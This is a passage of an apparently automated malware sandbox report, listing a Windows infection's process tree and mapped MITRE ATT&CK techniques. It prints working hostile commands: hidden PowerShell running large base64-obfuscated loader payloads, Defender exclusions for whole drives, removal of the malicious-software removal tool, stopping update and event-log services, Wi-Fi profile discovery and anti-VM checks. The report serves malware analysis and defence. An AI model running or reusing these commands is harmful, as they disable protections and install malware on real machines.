ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2620
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2548
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10432721121\SURG9Yv.cmd"
    3⤵
    PID:680
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10432721121\SURG9Yv.cmd"
      4⤵
      PID:3740
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2560
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4364
- - C:\Users\Admin\AppData\Local\Temp\10432730101\Yhihb8G.exe
    "C:\Users\Admin\AppData\Local\Temp\10432730101\Yhihb8G.exe"
    3⤵
    PID:3584
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3584 -s 1864
      4⤵
      Program crash
      PID:4840
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:968
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        5⤵
        
        PID:3756
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh wlan show profile
        5⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:1808
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr All
        5⤵
        
        PID:4492
- - C:\Users\Admin\AppData\Local\Temp\10432740101\9sWdA2p.exe
    "C:\Users\Admin\AppData\Local\Temp\10432740101\9sWdA2p.exe"
    3⤵
    PID:4008
- - C:\Users\Admin\AppData\Local\Temp\10432750101\P3Ow4LV.exe
    "C:\Users\Admin\AppData\Local\Temp\10432750101\P3Ow4LV.exe"
    3⤵
    PID:4468
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3400
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:3624
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:4288
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:2196
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:2928
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:4024
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:3784
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:3548
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      PID:4644
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      PID:2800
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      PID:3224
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      PID:4108
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:2360
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
      4⤵
      Launches sc.exe
      PID:4492
- - C:\Users\Admin\AppData\Local\Temp\10432760101\01aa58b899.exe
    "C:\Users\Admin\AppData\Local\Temp\10432760101\01aa58b899.exe"
    3⤵
    PID:4008
  - - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
      "C:\Users\Admin\AppData\Local\Temp\10432760101\01aa58b899.exe"
      4⤵
      PID:1056
- - C:\Users\Admin\AppData\Local\Temp\10432770101\TbV75ZR.exe
    "C:\Users\Admin\AppData\Local\Temp\10432770101\TbV75ZR.exe"
    3⤵
    PID:4756
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:2524
- - C:\Users\Admin\AppData\Local\Temp\10432780101\dojG16n.exe
    "C:\Users\Admin\AppData\Local\Temp\10432780101\dojG16n.exe"
    3⤵
    PID:4940
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:1652
- - C:\Users\Admin\AppData\Local\Temp\10432790101\7IIl2eE.exe
    "C:\Users\Admin\AppData\Local\Temp\10432790101\7IIl2eE.exe"
    3⤵
    PID:4480
  - - C:\Windows\SysWOW64\CMD.exe
      "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
      4⤵
      PID:3448
- - C:\Users\Admin\AppData\Local\Temp\10432800101\UZPt0hR.exe
    "C:\Users\Admin\AppData\Local\Temp\10432800101\UZPt0hR.exe"
    3⤵
    PID:2196
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
      4⤵
      PID:2828
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4768
  - - C:\Windows\system32\svchost.exe
      "C:\Windows\system32\svchost.exe"
      4⤵
      PID:1772
    - - C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        5⤵
        
        PID:4460
    - - C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        5⤵
        
        PID:3088
- - C:\Users\Admin\AppData\Local\Temp\10432810101\2062c11ea4.exe
    "C:\Users\Admin\AppData\Local\Temp\10432810101\2062c11ea4.exe"
    3⤵
    PID:4888
- - C:\Users\Admin\AppData\Local\Temp\10432830101\UZSECGPC.exe
    "C:\Users\Admin\AppData\Local\Temp\10432830101\UZSECGPC.exe"
    3⤵
    PID:6024
  - - C:\Users\Admin\AppData\Local\Temp\{71A64E98-25B7-475B-9721-64FF50AF6F47}\UZSECGPC.exe
      C:\Users\Admin\AppData\Local\Temp\{71A64E98-25B7-475B-9721-64FF50AF6F47}\UZSECGPC.exe -package:"C:\Users\Admin\AppData\Local\Temp\10432830101\UZSECGPC.exe" -no_selfdeleter -IS_temp -media_path:"C:\Users\Admin\AppData\Local\Temp\{71A64E98-25B7-475B-9721-64FF50AF6F47}\Disk1\" -tempdisk1folder:"C:\Users\Admin\AppData\Local\Temp\{71A64E98-25B7-475B-9721-64FF50AF6F47}\" -IS_OriginalLauncher:"C:\Users\Admin\AppData\Local\Temp\{71A64E98-25B7-475B-9721-64FF50AF6F47}\Disk1\UZSECGPC.exe"
      4⤵
      PID:4332

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5108

C:\ProgramData\Google\Chrome\updater.exe
C:\ProgramData\Google\Chrome\updater.exe
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:3292
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3156
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:2980
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:4888
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:4500
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:1272
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:5100
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:3976
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:2156
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:4104
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:1336
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:3224
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:4896
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:4400
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4000 -ip 4000
1⤵
PID:2532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3584 -ip 3584
1⤵
PID:1184

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
PID:3504

C:\Drivers\pcidrv.exe
C:\Drivers\pcidrv.exe
1⤵
PID:1808

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:4908

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:1036

C:\ProgramData\Google\Chrome\updater.exe
C:\ProgramData\Google\Chrome\updater.exe
1⤵
PID:3456
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:3756

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

